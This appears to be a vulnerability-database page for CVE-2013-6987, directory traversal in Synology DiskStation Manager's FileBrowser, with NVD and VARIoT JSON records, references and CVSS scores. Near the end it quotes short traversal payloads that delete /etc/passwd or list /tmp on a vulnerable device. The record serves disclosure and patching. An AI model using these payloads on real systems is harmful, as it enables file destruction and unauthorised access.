      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-66989"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-11-23T21:55:28.945000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DS114 Release Notes",
        "trust": 0.8,
        "url": "http://www.synology.com/en-us/releaseNote/model/DS114"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/khulnasoft-labs/awesome-security "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2013-6987"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005755"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-66989"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005755"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6987"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "http://seclists.org/fulldisclosure/2013/dec/177"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/bid/64483"
      },
      {
        "trust": 1.8,
        "url": "http://www.synology.com/en-us/releasenote/model/ds114"
      },
      {
        "trust": 1.8,
        "url": "http://www.exploit-db.com/exploits/30475"
      },
      {
        "trust": 1.8,
        "url": "http://packetstormsecurity.com/files/124563"
      },
      {
        "trust": 1.2,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89892"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6987"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6987"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/89892"
      },
      {
        "trust": 0.3,
        "url": "http://www.synology.com/dsm/index.php?lang=us"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6987"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/22.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.exploit-db.com/exploits/30475/"
      },
      {
        "trust": 0.1,
        "url": "http://www.andreafabrizi.it"
      },
      {
        "trust": 0.1,
        "url": "http://www.synology.com/en-global/company/news/article/437"
      },
      {
        "trust": 0.1,
        "url": "http://www.synology.com/en-global/support/faq/348)"
      },
      {
        "trust": 0.1,
        "url": "http://www.synology.com/en-global/support/download)."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6955"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-66989"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-6987"
      },
      {
        "db": "BID",
        "id": "64483"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005755"
      },
      {
        "db": "PACKETSTORM",
        "id": "124563"
      },
      {
        "db": "PACKETSTORM",
        "id": "125864"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-538"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6987"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-66989"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-6987"
      },
      {
        "db": "BID",
        "id": "64483"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005755"
      },
      {
        "db": "PACKETSTORM",
        "id": "124563"
      },
      {
        "db": "PACKETSTORM",
        "id": "125864"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-538"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6987"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-12-31T00:00:00",
        "db": "VULHUB",
        "id": "VHN-66989"
      },
      {
        "date": "2013-12-31T00:00:00",
        "db": "VULMON",
        "id": "CVE-2013-6987"
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "BID",
        "id": "64483"
      },
      {
        "date": "2014-01-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005755"
      },
      {
        "date": "2013-12-23T15:25:15",
        "db": "PACKETSTORM",
        "id": "124563"
      },
      {
        "date": "2014-03-25T23:12:57",
        "db": "PACKETSTORM",
        "id": "125864"
      },
      {
        "date": "2013-12-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-538"
      },
      {
        "date": "2013-12-31T16:04:23.790000",
        "db": "NVD",
        "id": "CVE-2013-6987"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-08-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-66989"
      },
      {
        "date": "2017-08-29T00:00:00",
        "db": "VULMON",
        "id": "CVE-2013-6987"
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "BID",
        "id": "64483"
      },
      {
        "date": "2014-01-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005755"
      },
      {
        "date": "2014-01-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-538"
      },
      {
        "date": "2024-11-21T02:00:06.723000",
        "db": "NVD",
        "id": "CVE-2013-6987"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "125864"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-538"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Synology DiskStation Manager of  FileBrowser Directory traversal vulnerability in components",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005755"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "path traversal",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-538"
      }
    ],
    "trust": 0.6
  }
}

fkie_cve-2013-6987

Vulnerability from fkie_nvd

Published

2013-12-31 16:04

Modified

2025-04-11 00:51

Severity ?

Summary

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/124563	Exploit
cve@mitre.org	http://seclists.org/fulldisclosure/2013/Dec/177	Exploit
cve@mitre.org	http://www.exploit-db.com/exploits/30475	Exploit
cve@mitre.org	http://www.securityfocus.com/bid/64483	Exploit
cve@mitre.org	http://www.synology.com/en-us/releaseNote/model/DS114
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/89892
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/124563	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2013/Dec/177	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://www.exploit-db.com/exploits/30475	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/64483	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://www.synology.com/en-us/releaseNote/model/DS114
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/89892

Impacted products

	Vendor	Product	Version
	synology	diskstation_manager	4.3-3810

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:synology:diskstation_manager:4.3-3810:*:*:*:*:*:*:*",
              "matchCriteriaId": "2433AB50-BAB2-4C38-8033-3031903B0DC6",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3 allow remote attackers to read, write, and delete arbitrary files via a .. (dot dot) in the (1) path parameter to file_delete.cgi or (2) folder_path parameter to file_share.cgi in webapi/FileStation/; (3) dlink parameter to fbdownload/; or unspecified parameters to (4) html5_upload.cgi, (5) file_download.cgi, (6) file_sharing.cgi, (7) file_MVCP.cgi, or (8) file_rename.cgi in webapi/FileStation/."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabilidades de salto de directorio en los componentes FileBrowser en Synology DiskStation Manager (DSM) anterior a 4.3 -3810 Update 3 permiten a atacantes remotos leer, escribir y borrar archivos de su elecci\u00f3n a trav\u00e9s de .. (punto punto) en el (1) par\u00e1metro path en file_delete.cgi o (2) el par\u00e1metro folder_path en file_share.cgi en WebAPI / FileStation /, (3) el par\u00e1metro Dlink en fbdownload /, o los par\u00e1metros no especificados en (4) html5_upload.cgi , (5) file_download.cgi, (6) file_sharing.cgi, (7) file_MVCP.cgi, o (8) file_rename.cgi en WebAPI / FileStation /."
    }
  ],
  "id": "CVE-2013-6987",
  "lastModified": "2025-04-11T00:51:21.963",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2013-12-31T16:04:23.790",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://packetstormsecurity.com/files/124563"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://seclists.org/fulldisclosure/2013/Dec/177"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/30475"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/64483"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.synology.com/en-us/releaseNote/model/DS114"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89892"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://packetstormsecurity.com/files/124563"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://seclists.org/fulldisclosure/2013/Dec/177"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/30475"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/64483"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.synology.com/en-us/releaseNote/model/DS114"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89892"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2013-6987 (GCVE-0-2013-6987)

Vulnerability from cvelistv5

gsd-2013-6987

Vulnerability from gsd

ghsa-qc6v-4m2q-7q39

Vulnerability from github

var-201312-0278

Vulnerability from variot

- Delete /etc/passwd

path=/test/../../etc/passwd&accurate_progress=true&api=SYNO.FileStation.Delete&method=start&version=1

- Arbitrary file download:

- Remote file list:

folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1

fkie_cve-2013-6987

Vulnerability from fkie_nvd

Tags

Sightings

Nomenclature